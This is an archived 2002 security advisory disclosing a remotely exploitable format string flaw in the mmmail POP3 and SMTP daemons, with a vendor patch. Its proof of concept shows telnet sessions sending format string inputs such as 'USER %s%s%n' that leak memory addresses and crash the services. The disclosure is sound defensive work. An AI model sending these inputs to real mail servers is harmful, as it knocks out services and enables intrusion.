OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Benoît Roussel (benoit.rousselintexxia.com)
Date: Wed Jun 12 2002 - 07:49:49 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    ________________________________________________________________________
    SECURITY ADVISORY INTEXXIA(c)
    04 06 2002 ID #1054-040602
    ________________________________________________________________________
    TITLE : mmmail POP3-SMTP Daemon Format String Vulnerability
    CREDITS : Guillaume Pelat / INTEXXIA
    ________________________________________________________________________

    SYSTEM AFFECTED
    ===============

            mmmail <= 0.0.13 (mmpop3d & mmsmtpd)

    ________________________________________________________________________

    DESCRIPTION
    ===========

            "mmmail provides SMTP and POP3 daemons using MySQL, running as
    a non-root user. It also supports bandwidth shaping. Relaying is not
    supported, although it has been designed to handle many users on many
    virtual hosts. It is fast and secure, uses threads, and has been written
    entirely from scratch and does not rely on mbox or Maildir formats."

            mmmail includes 2 daemons, mmpop3d and mmsmtpd. Both are
    vulnerable to a remotely exploitable format string issue.

    ________________________________________________________________________

    DETAILS
    =======

            There is a format string vulnerability in the 'mmsyslog()'
    function of the 'mmpop3d' and 'mmsmtpd' programs. This function acts
    like 'vsyslog()' if '__GLIBC__' is defined. It calls the 'syslog(3)'
    function with a format string that can be defined by a remote user. It
    is not necessary to authenticate to exploit this vulnerability.

    Successful exploitation of this flaw can allow a remote user to obtain
    a local account on the target machine.

    ________________________________________________________________________

    PROOF OF CONCEPT
    ================

    mmpop3d
    - -------

    test:~$ telnet test.lab.intexxia.com 110
    Trying x.x.x.x...
    Connected to test.lab.intexxia.com.
    Escape character is '^]'.
    +OK pop3.somehost.net (mmpop3d (mmmail-0.0.13/mmondor)) Service ready
    USER %p%p
    - -ERR Invalid username

    In the log file :
    mmpop3d[2165]: 3CFC8B53 USER 0x8052f620x80a44fc

    test:~$ telnet test.lab.intexxia.com 110
    Trying x.x.x.x...
    Connected to test.lab.intexxia.com.
    Escape character is '^]'.
    +OK pop3.somehost.net (mmpop3d (mmmail-0.0.13/mmondor)) Service ready
    USER %s%s%n
    Connection closed by foreign host.

    test:~$ telnet test.lab.intexxia.com 110
    Trying x.x.x.x...
    telnet: Unable to connect to remote host: Connection refused

    mmsmtpd
    - -------
    test:~$ telnet test.lab.intexxia.com 25
    Trying x.x.x.x...
    Connected to test.lab.intexxia.com.
    Escape character is '^]'.
    220 smtp.somehost.net (mmsmtpd (mmmail-0.0.13/mmondor)) Service ready
    HELO %p%p
    501 Invalid hostname

    In the log file :
    mmsmtpd[2188]: 3CFC8BF9 HELO 0x8052e360x80a447c

    test:~$ telnet test.lab.intexxia.com 25
    Trying x.x.x.x...
    Connected to test.lab.intexxia.com.
    Escape character is '^]'.
    220 smtp.somehost.net (mmsmtpd (mmmail-0.0.13/mmondor)) Service ready
    HELO %s%s%n
    Connection closed by foreign host.

    test:~$ telnet test.lab.intexxia.com 25
    Trying x.x.x.x...
    telnet: Unable to connect to remote host: Connection refused

    ________________________________________________________________________

    SOLUTION
    ========

    The following patch corrects this issue :

    iff -dru mmmail-0.0.13/mmlib/mmlog.c mmmail-0.0.13.fixed/mmlib/mmlog.c
    - --- mmmail-0.0.13/mmlib/mmlog.c Mon May 13 08:20:13 2002
    +++ mmmail-0.0.13.fixed/mmlib/mmlog.c Tue Jun 4 12:37:19 2002
    -70,7 +70,7
      va_start(lst, fmt);
      vsnprintf(buf, 1023, fmt, lst);
      va_end(lst);
    - - syslog(LOG_NOTICE, buf);
    + syslog(LOG_NOTICE, "%s", buf);
         }
     }

    A new version including this patch is available at the following URL :
    http://mmondor.gobot.ca/software/linux/mmmail-0.0.14.tar.gz

    ________________________________________________________________________

    VENDOR STATUS
    =============

            04-06-2002 : This bulletin was sent to Matthew Mondor.
            05-06-2002 : Matthew was very reactive and confirmed the
                         vulnerability. He released a new version.

    ________________________________________________________________________

    LEGALS
    ======

            mmmail is a registered trademark.

            Intexxia provides this information as a public service and "as
    is". Intexxia will not be held accountable for any damage or distress
    caused by the proper or improper usage of these materials.

            (c) intexxia 2002. This document is property of intexxia. Feel
    free to use and distribute this material as long as credit is given to
    intexxia and the author.

    ________________________________________________________________________

    CONTACT
    =======

    CERT intexxia certintexxia.com
    INTEXXIA http://www.intexxia.com
    171, av. Georges Clemenceau Standard : +33 1 55 69 49 10
    92024 Nanterre Cedex - France Fax : +33 1 55 69 78 80

    -----BEGIN PGP SIGNATURE-----
    Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

    iQA/AwUBPQdDak2N8BNyNDXLEQLHOQCgxlI4n/uFPTw4oZmjUVXTUhV8j7QAoLzr
    wM33noZDTKjFJE8HNkSdphPm
    =6uvy
    -----END PGP SIGNATURE-----